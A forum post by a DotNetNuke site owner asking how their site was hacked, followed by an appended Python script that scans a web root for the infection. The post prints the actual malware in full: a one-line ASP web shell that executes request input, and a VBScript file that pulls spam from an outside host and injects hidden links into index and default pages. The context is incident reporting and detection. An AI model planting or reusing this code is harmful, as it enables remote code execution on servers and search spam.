I am not sure whether this is the right place to ask this question...
Google Webmaster Tools sent me an email to tell me that my website had been hacked and they were right.
My default.aspx was modified and this code was inserted just before the </html> tag:
<div id=linkbyme><li><a href="http://www.mywebsite.com/images/us.asp">house slippers uggs</a></li></div><script>document.getElementById('linkbyme').style.display='none';</script></body>
(I've changed the URL to mywebsite.com as I don't want more unwanted attention directed to my website)
There were two foreign files in the /images folder: logs.asp and us.asp.
The first of these, log.asp, is pretty simple:
<%ExecuteGlobal request("tanya")%>
The next one, us.asp, is longer and seems to do the dirty work (I will include its contents at the end of this message). I have no idea what it does.
My passwords for the Super User and the SQL account were all hard (I've since changed them just in case). What do people think - is this a DNN problem or has my ISP dropped the ball? I am running a completely vanilla installation of DNN 07.03.02 (I was just waiting a day or so before I was going to install v07.03.04 - I had a bad experience being an early adopter of v07.03.03 with the Telerik editor). Any insights greatly appreciated. Thanks.
<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<%
Response.Addheader "Content-Type","text/html;charset=utf-8"
if len(Request.QueryString("ugg4"))<>0 Then
Response.Write GetResStr("http://ugg.wmjren.org/A525/"&"ugg4/"&Request.QueryString("ugg4"))
else
Response.Write GetResStr("http://ugg.wmjren.org/A525/"&"ugg4/us.asp")
end if
action=request("action")
replacestr=request("replacestr")
If action="createlinks" and replacestr<>"" Then
Response.Write CreateLink()
End If
Response.End
Function CreateLink()
set fso=CreateObject("Scripting.FileSystemObject")
set fs=fso.GetFolder(Server.MapPath("/"))
For Each file In fs.Files
If instr(LCase(file.name),"index")>0 or instr(LCase(file.name),"default")>0 Then
set fsofile=fso.OpenTextFile(file, 1, true)
On Error Resume next
tempstr=fsofile.Readall
pos1=instr(tempstr,"<div id=linkbyme>")
If pos1>0 then
tempstr=RegexReplace(tempstr,"<div id=linkbyme>(.+?)</body>","</body>")
End If
tempstr=replace(tempstr, "</body>", "<div id=linkbyme>"&replacestr&"</div><script>document.getElementById('linkbyme').style.display='none';</script></body>")
set fsofile1=fso.OpenTextFile(file, 2, true)
fsofile1.WriteLine tempstr
fsofile1.close
CreateLink="linkbyme"
End If
Next
set fso=nothing
End Function
Function RegexReplace(source1,pattern1,replace1)
Set re = New RegExp
re.Pattern = pattern1
re.Global = True
re.IgnoreCase = True
RegexReplace= re.replace(source1,replace1)
End Function
function GetResStr(URL)
dim ResBody,ResStr,PageCode
Set Http=server.createobject("msxml2.serverxmlhttp.3.0")
Http.setTimeouts 10000, 10000, 10000, 10000
Http.open "GET",URL,False
Http.Send()
If Http.Readystate =4 Then
If Http.status=200 Then
ResStr=http.responseText
ResBody=http.responseBody
PageCode="utf-8"
GetResStr=BytesToBstr(http.responseBody,trim(PageCode))
End If
End If
End Function
Function BytesToBstr(Body,Cset)
Dim Objstream
Set Objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>
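A way to sweep a copy of the web root for the three things reported above (the hidden linkbyme block, the one-line request evaluator, and script files sitting in /images), as an added example that is not part of the original post. The function names, the `static_dirs` default and the sample files are assumptions constructed for illustration, and the evaluator pattern is generalised beyond the post's `ExecuteGlobal` to the sibling `Execute` and `Eval` calls.

```python
import re
import tempfile
from pathlib import Path

# Patterns from the post; EVAL_SHELL also covers sibling Execute/Eval calls (added).
HIDDEN_LINK_BLOCK = re.compile(
    r"<div id=linkbyme>.*?</div>\s*<script>[^<]*'linkbyme'[^<]*</script>", re.I | re.S)
EVAL_SHELL = re.compile(r"\b(?:ExecuteGlobal|Execute|Eval)\s*\(?\s*request\s*\(", re.I)
SCRIPT_EXTS = {".asp", ".aspx", ".ashx"}
PAGE_EXTS = SCRIPT_EXTS | {".htm", ".html"}

def scan_webroot(root, static_dirs=("images",)):
    """Return sorted (relative_path, finding) tuples for page files under root."""
    root, findings = Path(root), []
    for path in root.rglob("*"):
        ext = path.suffix.lower()
        if not path.is_file() or ext not in PAGE_EXTS:
            continue
        rel = path.relative_to(root)
        text = path.read_text(encoding="utf-8", errors="replace")
        if HIDDEN_LINK_BLOCK.search(text):
            findings.append((rel.as_posix(), "hidden-link-block"))
        if EVAL_SHELL.search(text):
            findings.append((rel.as_posix(), "request-eval-shell"))
        # Assumption: folders in static_dirs should never hold server-side scripts.
        if ext in SCRIPT_EXTS and any(p.lower() in static_dirs for p in rel.parts[:-1]):
            findings.append((rel.as_posix(), "script-in-static-dir"))
    return sorted(findings)

# Constructed sample site modelled on the snippets quoted in the post.
INFECTED_PAGE = ("<html><body><p>Home</p><div id=linkbyme><li>"
    '<a href="http://www.mywebsite.com/images/us.asp">house slippers uggs</a></li></div>'
    "<script>document.getElementById('linkbyme').style.display='none';</script></body></html>")
SAMPLE_SITE = {
    "default.aspx": INFECTED_PAGE,
    "about.aspx": "<html><body><p>About</p></body></html>",
    "images/logs.asp": '<%ExecuteGlobal request("tanya")%>',
    "images/us.asp": '<% Response.Write "stand-in for the longer script" %>',
}

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE_SITE.items():
            target = Path(tmp, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_webroot(tmp)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Run `scan_webroot` against an offline copy of the site so file timestamps on the live server stay intact for later comparison with the IIS logs.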